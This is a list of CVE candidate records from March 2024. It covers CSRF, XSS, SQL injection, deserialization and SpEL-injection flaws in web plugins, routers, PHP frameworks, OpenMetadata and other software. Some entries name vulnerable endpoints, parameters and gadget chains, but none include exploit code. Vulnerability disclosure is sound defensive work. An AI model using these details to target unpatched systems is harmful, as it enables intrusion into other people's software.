CVE    2024    29009    Candidate    Cross-site request forgery (CSRF) vulnerability in easy-popup-show all versions allows a remote unauthenticated attacker to hijack the authentication of the administrator and to perform unintended operations if the administrator views a malicious page while logged in.    MISC:https://jvn.jp/en/jp/JVN86206017/   |   URL:https://jvn.jp/en/jp/JVN86206017/   |   MISC:https://wordpress.org/plugins/easy-popup-show/   |   URL:https://wordpress.org/plugins/easy-popup-show/    Assigned (20240314)
CVE    2024    28916    Candidate    Xbox Gaming Services Elevation of Privilege Vulnerability    MISC:Xbox Gaming Services Elevation of Privilege Vulnerability   |   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28916    Assigned (20240313)
CVE    2024    2891    Candidate    A vulnerability, which was classified as critical, was found in Tenda AC7 15.03.06.44. Affected is the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257934 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:Submit #300354 | Tenda AC7 AC7V1.0 V15.03.06.44 buffer overflow   |   URL:https://vuldb.com/?submit.300354   |   MISC:VDB-257934 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257934   |   MISC:VDB-257934 | Tenda AC7 QuickIndex formQuickIndex stack-based overflow   |   URL:https://vuldb.com/?id.257934   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC7/v1/formQuickIndex.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC7/v1/formQuickIndex.md    Assigned (20240326)
CVE    2024    28891    Candidate    SQL injection vulnerability exists in the script Handler_CFG.ashx.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    2889    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for Amazon allows Stored XSS. This issue affects WP-Lister Lite for Amazon: from n/a through 2.6.11.    MISC:https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-11-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-lister-for-amazon/wordpress-wp-lister-lite-for-amazon-plugin-2-6-11-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    2888    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Post and Page Builder by BoldGrid – Visual Drag and Drop Editor allows Stored XSS. This issue affects Post and Page Builder by BoldGrid – Visual Drag and Drop Editor: from n/a through 1.26.2.    MISC:https://patchstack.com/database/vulnerability/post-and-page-builder/wordpress-post-and-page-builder-by-boldgrid-plugin-1-26-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/post-and-page-builder/wordpress-post-and-page-builder-by-boldgrid-plugin-1-26-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240326)
CVE    2024    28868    Candidate    Umbraco is an ASP.NET content management system. Umbraco 10 prior to 10.8.4 with access to the native login screen is vulnerable to a possible user enumeration attack. This issue was fixed in version 10.8.5. As a workaround, one may disable the native login screen by exclusively using external logins.    MISC:https://github.com/umbraco/Umbraco-CMS/commit/7e1d1a1968000226cd882fff078b122b8d46c44d   |   URL:https://github.com/umbraco/Umbraco-CMS/commit/7e1d1a1968000226cd882fff078b122b8d46c44d   |   MISC:https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-552f-97wf-pmpq   |   URL:https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-552f-97wf-pmpq    Assigned (20240311)
CVE    2024    28865    Candidate    django-wiki is a wiki system for Django. Installations of django-wiki prior to version 0.10.1 are vulnerable to maliciously crafted article content that can cause severe use of server CPU through a regular expression loop. Version 0.10.1 fixes this issue. As a workaround, close off access to create and edit articles by anonymous users.    MISC:https://github.com/django-wiki/django-wiki/commit/8e280fd6c0bd27ce847c67b2d216c6cbf920f88c   |   URL:https://github.com/django-wiki/django-wiki/commit/8e280fd6c0bd27ce847c67b2d216c6cbf920f88c   |   MISC:https://github.com/django-wiki/django-wiki/security/advisories/GHSA-wj85-w4f4-xh8h   |   URL:https://github.com/django-wiki/django-wiki/security/advisories/GHSA-wj85-w4f4-xh8h    Assigned (20240311)
CVE    2024    28864    Candidate    SecureProps is a PHP library designed to simplify the encryption and decryption of property data in objects. A vulnerability in SecureProps version 1.2.0 and 1.2.1 involves a regex failing to detect tags during decryption of encrypted data. This occurs when the encrypted data has been encoded with `NullEncoder` and passed to `TagAwareCipher`, and contains special characters such as `\n`. As a result, the decryption process is skipped since the tags are not detected. This causes the encrypted data to be returned in plain format. The vulnerability affects users who implement `TagAwareCipher` with any base cipher that has `NullEncoder` (not default). The patch for the issue has been released. Users are advised to update to version 1.2.2. As a workaround, one may use the default `Base64Encoder` with the base cipher decorated with `TagAwareCipher` to prevent special characters in the encrypted string from interfering with regex tag detection logic. This workaround is safe but may involve double encoding since `TagAwareCipher` uses `NullEncoder` by default.    MISC:https://github.com/IlicMiljan/Secure-Props/commit/ab7b561040cd37fda3dbf9a6cab01fefcaa16627   |   URL:https://github.com/IlicMiljan/Secure-Props/commit/ab7b561040cd37fda3dbf9a6cab01fefcaa16627   |   MISC:https://github.com/IlicMiljan/Secure-Props/issues/20   |   URL:https://github.com/IlicMiljan/Secure-Props/issues/20   |   MISC:https://github.com/IlicMiljan/Secure-Props/pull/21   |   URL:https://github.com/IlicMiljan/Secure-Props/pull/21   |   MISC:https://github.com/IlicMiljan/Secure-Props/security/advisories/GHSA-rj29-j2g4-77q8   |   URL:https://github.com/IlicMiljan/Secure-Props/security/advisories/GHSA-rj29-j2g4-77q8    Assigned (20240311)
CVE    2024    28863    Candidate    node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within a few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.    MISC:https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7   |   URL:https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7   |   MISC:https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36   |   URL:https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36    Assigned (20240311)
CVE    2024    28862    Candidate    The Ruby One Time Password library (ROTP) is an open source library for generating and validating one time passwords. Affected versions had overly permissive default permissions. Users should patch to version 6.3.0. Users unable to patch may correct file permissions after installation.    MISC:https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f   |   URL:https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f    Assigned (20240311)
CVE    2024    28861    Candidate    Symfony 1 is a community-driven fork of the 1.x branch of Symfony, a PHP framework for web projects. Starting in version 1.1.0 and prior to version 1.5.19, Symfony 1 has a gadget chain due to dangerous deserialization in `sfNamespacedParameterHolder` class that would enable an attacker to get remote code execution if a developer deserializes user input in their project. Version 1.5.19 contains a patch for the issue.    MISC:https://github.com/FriendsOfSymfony1/symfony1/commit/0bd9d59c69221f49bfc8be8b871b79e12d7d171a   |   URL:https://github.com/FriendsOfSymfony1/symfony1/commit/0bd9d59c69221f49bfc8be8b871b79e12d7d171a   |   MISC:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-pv9j-c53q-h433   |   URL:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-pv9j-c53q-h433    Assigned (20240311)
CVE    2024    28859    Candidate    Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, latest Swiftmailer, better performance, composer compatible and PHP 8 support. Symfony 1 has a gadget chain due to a vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserializes user input in their project. This vulnerability presents no direct threat but is a vector that will enable remote code execution if a developer deserializes untrusted user data. Symfony 1 depends on Swift Mailer, which is bundled by default in the vendor directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods. These methods are called when PHP destroys the object in memory. However, it is possible to include any object type in `$this->_keys` to make PHP access array/object properties other than those intended by the developer. In particular, it is possible to abuse the array access which is triggered on foreach($this->_keys ...) for any class implementing the ArrayAccess interface. This may allow an attacker to execute any PHP command, which leads to remote code execution. This issue has been addressed in version 1.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166   |   URL:https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166   |   MISC:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r   |   URL:https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r    Assigned (20240311)
CVE    2024    28855    Candidate    ZITADEL, open source authentication management software, uses Go templates to render the login UI. Due to improper use of the `text/template` instead of the `html/template` package, the Login UI did not sanitize input parameters prior to versions 2.47.3, 2.46.1, 2.45.1, 2.44.3, 2.43.9, 2.42.15, and 2.41.15. An attacker could create a malicious link, where he injected code which would be rendered as part of the login screen. While it was possible to inject HTML including JavaScript, the execution of such scripts would be prevented by the Content Security Policy. Versions 2.47.3, 2.46.1, 2.45.1, 2.44.3, 2.43.9, 2.42.15, and 2.41.15 contain a patch for this issue. No known workarounds are available.    MISC:https://github.com/zitadel/zitadel/releases/tag/v2.41.15   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.41.15   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.42.15   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.42.15   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.43.9   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.43.9   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.44.3   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.44.3   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.45.1   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.45.1   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.46.1   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.46.1   |   MISC:https://github.com/zitadel/zitadel/releases/tag/v2.47.3   |   URL:https://github.com/zitadel/zitadel/releases/tag/v2.47.3   |   MISC:https://github.com/zitadel/zitadel/security/advisories/GHSA-hfrg-4jwr-jfpj   |   URL:https://github.com/zitadel/zitadel/security/advisories/GHSA-hfrg-4jwr-jfpj    Assigned (20240311)
CVE    2024    28854    Candidate    tls-listener is a rust lang wrapper around a connection listener to support TLS. With the default configuration of tls-listener, a malicious user can open 6.4 `TcpStream`s a second, sending 0 bytes, and can trigger a DoS. The default configuration options make any public service using `TlsListener::new()` vulnerable to a slow-loris DoS attack. This impacts any publicly accessible service using the default configuration of tls-listener in versions prior to 0.10.0. Users are advised to upgrade. Users unable to upgrade may mitigate this by passing a large value, such as `usize::MAX` as the parameter to `Builder::max_handshakes`.    MISC:https://en.wikipedia.org/wiki/Slowloris_(computer_security)   |   URL:https://en.wikipedia.org/wiki/Slowloris_(computer_security)   |   MISC:https://github.com/tmccombs/tls-listener/commit/d5a7655d6ea9e53ab57c3013092c5576da964bc4   |   URL:https://github.com/tmccombs/tls-listener/commit/d5a7655d6ea9e53ab57c3013092c5576da964bc4   |   MISC:https://github.com/tmccombs/tls-listener/security/advisories/GHSA-2qph-qpvm-2qf7   |   URL:https://github.com/tmccombs/tls-listener/security/advisories/GHSA-2qph-qpvm-2qf7    Assigned (20240311)
CVE    2024    28851    Candidate    The Snowflake Hive metastore connector provides an easy way to query Hive-managed data via Snowflake. Snowflake Hive MetaStore Connector has addressed a potential elevation of privilege vulnerability in a `helper script` for the Hive MetaStore Connector. A malicious insider without admin privileges could, in theory, use the script to download content from a Microsoft domain to the local system and replace the valid content with malicious code. If the attacker then also had local access to the same system where the maliciously modified script is run, they could attempt to manipulate users into executing the attacker-controlled helper script, potentially gaining elevated privileges to the local system. The vulnerability in the script was patched on February 09, 2024, without a version bump to the Connector. Users who use the helper script are strongly advised to use the latest version as soon as possible. Users unable to upgrade should avoid using the helper script.    MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/blob/master/scripts/add_snowflake_hive_metastore_connector_script_action.sh   |   URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/blob/master/scripts/add_snowflake_hive_metastore_connector_script_action.sh   |   MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/commit/dfbf87dff456f6bb62c927711d97316f0c71d8ca   |   URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/commit/dfbf87dff456f6bb62c927711d97316f0c71d8ca   |   MISC:https://github.com/snowflakedb/snowflake-hive-metastore-connector/security/advisories/GHSA-r68p-g2x9-mq7x   |   URL:https://github.com/snowflakedb/snowflake-hive-metastore-connector/security/advisories/GHSA-r68p-g2x9-mq7x    Assigned (20240311)
CVE    2024    28850    Candidate    WP Crontrol controls the cron events on WordPress websites. WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions is met: the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters. As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event.    MISC:https://github.com/johnbillion/wp-crontrol/releases/tag/1.16.2   |   URL:https://github.com/johnbillion/wp-crontrol/releases/tag/1.16.2   |   MISC:https://github.com/johnbillion/wp-crontrol/security/advisories/GHSA-9xvf-cjvf-ff5q   |   URL:https://github.com/johnbillion/wp-crontrol/security/advisories/GHSA-9xvf-cjvf-ff5q    Assigned (20240311)
CVE    2024    28849    Candidate    follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. In affected versions follow-redirects only clears the authorization header during a cross-domain redirect, but keeps the proxy-authentication header, which contains credentials too. This vulnerability may lead to credentials leak, but has been addressed in version 1.15.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.    FEDORA:FEDORA-2024-db558f6fb2   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOIF4EPQUCKDBEVTGRQDZ3CGTYQHPO7Z/   |   MISC:https://fetch.spec.whatwg.org/#authentication-entries   |   URL:https://fetch.spec.whatwg.org/#authentication-entries   |   MISC:https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b   |   URL:https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b   |   MISC:https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp   |   URL:https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp   |   MISC:https://github.com/psf/requests/issues/1885   |   URL:https://github.com/psf/requests/issues/1885   |   MISC:https://hackerone.com/reports/2390009   |   URL:https://hackerone.com/reports/2390009    Assigned (20240311)
CVE    2024    28848    Candidate    OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `CompiledRule::validateExpression` method evaluates an SpEL expression using a `StandardEvaluationContext`, allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution. The `/api/v1/policies/validation/condition/<expression>` endpoint passes user-controlled data to `CompiledRule::validateExpression`, allowing authenticated (non-admin) users to execute arbitrary system commands on the underlying operating system. In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and therefore any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-236`. This issue may lead to Remote Code Execution and has been resolved in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.    
MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51   |   URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57   |   URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57   |   MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5xv3-fm7g-865r   |   URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5xv3-fm7g-865r    Assigned (20240311)
CVE    2024    28847    Candidate    OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. Similarly to the GHSL-2023-250 issue, `AlertUtil::validateExpression` is also called from `EventSubscriptionRepository.prepare()`, which can lead to Remote Code Execution. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that, even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and, therefore, after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/events/subscriptions` which gets handled by `EventSubscriptionResource.createOrUpdateEventSubscription()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query. This issue may lead to Remote Code Execution and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-251`.    
MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289   |   MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-8p5r-6mvv-2435   |   
URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-8p5r-6mvv-2435    Assigned (20240311)
CVE    2024    28835    Candidate    A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the "certtool --verify-chain" command.    MISC:RHBZ#2269084   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269084   |   MISC:https://access.redhat.com/security/cve/CVE-2024-28835   |   URL:https://access.redhat.com/security/cve/CVE-2024-28835   |   MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html   |   URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html    Assigned (20240311)
CVE    2024    28834    Candidate    A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.    MISC:RHBZ#2269228   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269228   |   MISC:https://access.redhat.com/security/cve/CVE-2024-28834   |   URL:https://access.redhat.com/security/cve/CVE-2024-28834   |   MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html   |   URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html   |   MISC:https://people.redhat.com/~hkario/marvin/   |   URL:https://people.redhat.com/~hkario/marvin/    Assigned (20240311)
CVE    2024    28824    Candidate    Least privilege violation and reliance on untrusted inputs in the mk_informix Checkmk agent plugin before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges.    MISC:https://checkmk.com/werk/16198   |   URL:https://checkmk.com/werk/16198    Assigned (20240311)
CVE    2024    28823    Candidate    Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.    MISC:https://github.com/awslabs/aws-js-s3-explorer/commit/f62f12960d081895960d0dc6fde8364f25d651b6   |   MISC:https://github.com/awslabs/aws-js-s3-explorer/issues/118    Assigned (20240311)
CVE    2024    28816    Candidate    Student Information Chatbot a0196ab allows SQL injection via the username to the login function in index.php.    MISC:https://github.com/AaravRajSIngh/Chatbot/pull/10    Assigned (20240311)
CVE    2024    28757    Candidate    libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).    CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0001/   |   FEDORA:FEDORA-2024-40b98c9ced   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/   |   FEDORA:FEDORA-2024-4e6e660fae   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/   |   FEDORA:FEDORA-2024-afb73e6f62   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/   |   MISC:https://github.com/libexpat/libexpat/issues/839   |   MISC:https://github.com/libexpat/libexpat/pull/842    Assigned (20240310)
CVE    2024    28756    Candidate    The SolarEdge mySolarEdge application before 2.20.1 for Android has a certificate verification issue that allows a Machine-in-the-middle (MitM) attacker to read and alter all network traffic between the application and the server.    MISC:https://www.solaredge.com/coordinated-vulnerability-disclosure-policy/advisories/sedg-2024-1   |   MISC:https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-012.txt    Assigned (20240310)
CVE    2024    28754    Candidate    RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to cause a persistent denial of service (bricking) via a crafted request.    MISC:https://dustri.org/b/carrot-disclosure.html    Assigned (20240308)
CVE    2024    28753    Candidate    RaspAP (aka raspap-webgui) through 3.0.9 allows remote attackers to read the /etc/passwd file via a crafted request.    MISC:https://dustri.org/b/carrot-disclosure.html    Assigned (20240308)
CVE    2024    28752    Candidate    A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. Users of other data bindings (including the default databinding) are not impacted.    MISC:https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt   |   URL:https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt    Assigned (20240308)
CVE    2024    28746    Candidate    Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access. Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability    MISC:https://github.com/apache/airflow/pull/37881   |   URL:https://github.com/apache/airflow/pull/37881   |   MISC:https://lists.apache.org/thread/b4pffc7w7do6qgk4jjbyxvdz5odrvny7   |   URL:https://lists.apache.org/thread/b4pffc7w7do6qgk4jjbyxvdz5odrvny7    Assigned (20240308)
CVE    2024    28745    Candidate    Improper export of Android application components issue exists in 'ABEMA' App for Android prior to 10.65.0 allowing another app installed on the user's device to access an arbitrary URL on 'ABEMA' App for Android via Intent. If this vulnerability is exploited, an arbitrary website may be displayed on the app, and as a result, the user may become a victim of a phishing attack.    MISC:https://jvn.jp/en/jp/JVN70640802/   |   URL:https://jvn.jp/en/jp/JVN70640802/    Assigned (20240308)
CVE    2024    28735    Candidate    An incorrect access control issue in Unit4 Financials by Coda v.2023Q4 allows a remote attacker to escalate privileges via a crafted script to the change password function.    MISC:http://financials.com   |   MISC:http://unit4.com   |   MISC:https://packetstormsecurity.com/files/177620/Financials-By-Coda-Authorization-Bypass.html    Assigned (20240308)
CVE    2024    28734    Candidate    Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.    MISC:http://financials.com   |   MISC:http://unit4.com   |   MISC:https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html    Assigned (20240308)
CVE    2024    2873    Candidate    A vulnerability was found in wolfSSH's server-side state machine before versions 1.4.17. A malicious client could create channels without first performing user authentication, resulting in unauthorized access.    MISC:https://github.com/wolfSSL/wolfssh/pull/670   |   URL:https://github.com/wolfSSL/wolfssh/pull/670   |   MISC:https://github.com/wolfSSL/wolfssh/pull/671   |   URL:https://github.com/wolfSSL/wolfssh/pull/671   |   MISC:https://www.wolfssl.com/docs/security-vulnerabilities/   |   URL:https://www.wolfssl.com/docs/security-vulnerabilities/    Assigned (20240325)
CVE    2024    28715    Candidate    Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.    MISC:https://github.com/Lq0ne/CVE-2024-28715    Assigned (20240308)
CVE    2024    28684    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/module_main.php    MISC:https://github.com/777erp/cms/blob/main/16.md    Assigned (20240308)
CVE    2024    28683    Candidate    DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via create file.    MISC:https://github.com/777erp/cms/blob/main/20.md    Assigned (20240308)
CVE    2024    28682    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/sys_cache_up.php.    MISC:https://github.com/777erp/cms/blob/main/13.md    Assigned (20240308)
CVE    2024    28681    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/plus_edit.php.    MISC:https://github.com/777erp/cms/blob/main/17.md    Assigned (20240308)
CVE    2024    28680    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_add.php.    MISC:https://github.com/777erp/cms/blob/main/11.md    Assigned (20240308)
CVE    2024    28679    Candidate    DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via Photo Collection.    MISC:https://github.com/777erp/cms/blob/main/19.md    Assigned (20240308)
CVE    2024    28678    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_description_main.php    MISC:https://github.com/777erp/cms/blob/main/15.md    Assigned (20240308)
CVE    2024    28677    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/article_keywords_main.php.    MISC:https://github.com/777erp/cms/blob/main/14.md    Assigned (20240308)
CVE    2024    28676    Candidate    DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via /dede/article_edit.php.    MISC:https://github.com/777erp/cms/blob/main/18.md    Assigned (20240308)
CVE    2024    28675    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_edit.php    MISC:https://github.com/777erp/cms/blob/main/12.md    Assigned (20240308)
CVE    2024    28673    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/mychannel_edit.php.    MISC:https://github.com/777erp/cms/blob/main/4.md    Assigned (20240308)
CVE    2024    28672    Candidate    DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/media_edit.php.    MISC:https://github.com/777erp/cms/blob/main/3.md    Assigned (20240308)
